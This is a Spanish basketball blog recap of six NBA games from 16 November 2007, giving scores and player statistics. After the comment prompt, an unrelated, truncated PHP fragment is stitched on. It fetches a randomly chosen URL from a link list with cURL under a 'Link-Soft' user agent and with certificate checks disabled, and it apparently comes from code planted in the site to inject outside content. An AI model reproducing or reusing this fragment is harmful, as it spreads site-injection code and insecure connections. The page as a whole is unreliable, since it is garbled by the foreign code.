La Crónica (16-11-07). 1ª parte

18 de November de 2007 por Viva_Dirk

Con retraso aparece la primera parte de la crónica del viernes. Muchísimos partidos y muchas cosas que explicar entre ellas el primer tiro ganador sobre la bocina de Kevin Durant, el buen partido de Calderón, la victoria de unos Lakers que siguen coleccionando victorias inesperadas y la victoria de los Celtics sobre los Heats que los mantiene como único equipo invicto después de 8 partidos.

 

 

 

 


Pistons 91 Lakers 103

Lamar Odom lideró a los Lakers en la victoria frente a Detroit con 25 puntos y 15 rebotes(9 de ellos ofensivos), bien secundado por Bryant 19-4-7, aunque pobres porcentajes de tiro(6 de 18), y con otros 4 jugadores anotando 10 puntos o mas(Cook, Farmar, Bynum y Radmanovic). En los Pistons, Prince fue el mejor con 16-9, y aunque Flip Murray y Rip Hamilton anotaron 15 y 16 puntos respectivamente, las 9 perdidas de balón que sumaron entre ambos supuso un lastre en el juego de los de la Motown. Los 48 puntos en la zona que anotaron los angelinos(bastantes fruto de los 23 rebotes ofensivos que capturaron) dejan muy lejos a los 28 conseguidos por los Pistons. Otro dato a tener en cuenta es la aportación anotadora del banquillo Laker, que hizo 40 puntos, por 22 de los suplentes de Flip Saunders. Por último los Lakers cuidaron el balón de forma excelente con tan solo 9 pérdidas.

Pacers 101 Raptors 110

Jose Manuel Calderón lideró a Toronto en su victoria contra Indiana con su primer doble doble de la temporada, 15 puntos y 10 asistencias, acompañadas de un gran 6 de 8 en tiros de campo dejan a la luz una vez mas que el extremeño es todo un lujo como base suplente. Jorge Garbajosa volvió a disputar un buen número de minutos, 24, en los que anotó 8 puntos, capturó 6 rebotes y dió 2 asistencias; la veteranía y el saber hacer de Jorge son fundamentales en un equipo como los Raptors. Dejando a un lado a nuestros compatriotas, el máximo anotador del partido fue Chris Bosh con 22, 12 de ellos desde la linea de tiro libre. TJ Ford y Anthony Parker anotaron 15 puntos, mientras que Delfino y Kapono superaban también la decena. En los Pacers Tinsley y Murphy fueron los mejores con 20 puntos cada uno, pero un mal dia en el tiro para los aleros(7 de 26 entre ambos) y un Jermaine O´Neal que sigue, siendo generosos, a medio gas, no permitieron mas que dar guerra a los canadienses.

Blazers 88 Sixers 92

Partido lleno de imprecisiones en Phily, donde el mayor poder reboteador y acierto en el tiro de los locales decidió el partido. El hombre orquesta que es Iguodala volvió a hacer de todo, 22 puntos, 4 rebotes, 7 asistencias, 3 robos, 1 tapón y también 6 pérdidas. El ‘nuevo Iverson’ que esperan los aficionados de los Sixers sea Louis Williams se fue hasta los 19 puntos en 25 minutos, con un 8 de 13 en tiros de campo, impropio de su antesor en el cargo. Jason Smith y Andre Miller superaron la decena de puntos, aunque este último sigue a un nivel muy bajo. En Portland la parejita Roy&Aldridge sumaron 50 puntos, pero en el resto del equipo solo Webster anotó 10 puntos. Sergio disputó 8 minutos en los que dio 2 asistencias, perdió 2 balones, anotó 2 puntos y robó un balon.

Heat 91 Celtics 92

Los Celtics siguen invictos, y son ya 8 partidos los que llevan disputados. Pero la victoria de ayer fue mas sufrida de lo esperado, mas aun cuando afrontaron el último cuarto con 11 puntos de ventaja. De hecho no ganaron el partido los de Boston sino que los Heat lo tiraron a la basura con un 16 de 28 en tiros libres, mas propio de un equipo amateur que de un aspirante a jugar los play-offs de la NBA, los Celtics tuvieron un casi inmaculado 17 de 18. En los locales, Kevin Garnett una vez mas lideró a Boston con 26-11-4 y un 10 de 14 en tiros, huele a MVP el Sr.Big Ticket. Ray Allen fue esta vez el segundo espada con 19 puntos y 7 asistencias, y Paul Pierce estuvo flojo con 12 puntos, ambos estuvieron mal en las pérdidas sumaron 8. Rajon Rondo rozó el doble doble, con 9 puntos y 10 asistencias, incluso estuvo cerca del triple doble ya que sumó 7 rebotes. Perkins y Posey también alcanzaron los 10 puntos o mas. En Miami la vuelta de Wade no podia hacer otra cosa que mejorar al equipo, el escolta hizo 23 puntos y 6 asistencias, y tanto Shaq como Ricky Davis respondieron con buenos partidos, 17-9 para el pivot y 20 puntos de Davis. Solo Haslem ayudó con 9 puntos, 8 rebotes y 3 robos.

Magics 95 Nets 70

Triple doble Nº89 en la carrera de Jason Kidd, pero paliza de los Magics a su equipo. Los Nets no estuvieron en ningun momento luchando por el partido, ya que en el primer cuarto ya perdian 25-10 y el parcial del último fue 26-11. En los Magic todo funcionó a la perfección, Nelson jugó e hizo jugar, Lewis anotó desde cualquier posición, Turkoglu hizo de intendencia y Howard sigue demostrando que es una bestia, y con los 19 de ayer supera a Shaquille O’Neal como jugador mas joven en atrapar 3000 rebotes. Apenas les hizo falta la aportación de ningun suplente. En los Nets 4 jugadores superaron los 10 puntos, pero la baja de Carter y un Krstic que apenas puede jugar, es demasiado lastre, mas aun cuando te enfrentas a uno de los equipos mas en forma de la liga.

Sonics 126 Hawks 123

El primer buzzer beater de Kevin Durant en la NBA eclipsa todo lo referente a este encuentro, pero la verdad es que el novato no fue el mejor del partido. Damien Wilkins anotó 41 puntos, record personal, pero no contento con eso capturó 9 rebotes, con un mastodontico 15 de 20 en tiros de campo. Durant alcanzó los 21 puntos, con 3 robos y 3 tapones, pero también con 4 perdidas de balón. Nick Collison consiguió un doble doble con 10 puntos y 14 rebotes. Watson con 15 puntos y 9 asistencias, y Wally saliendo desde el banquillo con 15 puntos fueron los otros artífices de la victoria. Wilcox anotó 16 puntos pero tuvo una noche desafortunada tanto en el apartado reboteador como en la selección de tiro. Por Atlanta la baja de Josh Smith se dejó notar en la intimidación pese a los 5 tapones de Al Horford. Joe Johnson volvió a ser el lide del equipo con 39-5-6, aunque 34 tiros se antojan demasiados para 39 puntos. Childress aprovechó la baja de Smith para realizar un gran partido, 22-10 fueron sus números. Marvin Williams sigue haciendolo muy bien y anoche con su presencia en el campo el balance para los Hawks fue de +18, 18-7-4 y 4 robos para el de North Carolina. El juego interior formado por Horford y Pachulia se complementó para sumar 21 puntos y 20 rebotes. Al fin y al cabo, el partido tuvo 2 prórrogas y solo un canastón del Nº2 del draft sobre la bocina evitó una tercera.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>